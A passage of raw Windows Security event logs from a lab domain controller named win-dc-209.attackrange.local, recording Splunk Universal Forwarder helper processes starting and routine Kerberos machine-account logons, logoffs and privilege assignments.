Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x8f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:18:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263651
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1474
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:18:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263652
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x340
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:18:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263654
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1608
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:18:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263653
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x144c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:18:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263657
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73F47F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:18:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263656
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x73F47F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59937
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:18:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263655
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73F47F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263668
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73F90C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263667
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73F9FA
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263666
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73FA42
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263665
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x73FAB4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59942
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263664
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73FAB4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263663
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x73FA42
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 59941
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263662
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73FA42
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263661
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x73F9FA
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263660
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73F9FA
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263659
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x73F90C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59940
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:19:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263658
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73F90C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:19:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263669
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x12dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:19:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263671
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x374
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:19:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263670
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x8e0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:19:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263672
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1be4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:19:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263673
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe08
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:19:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263675
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1784
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
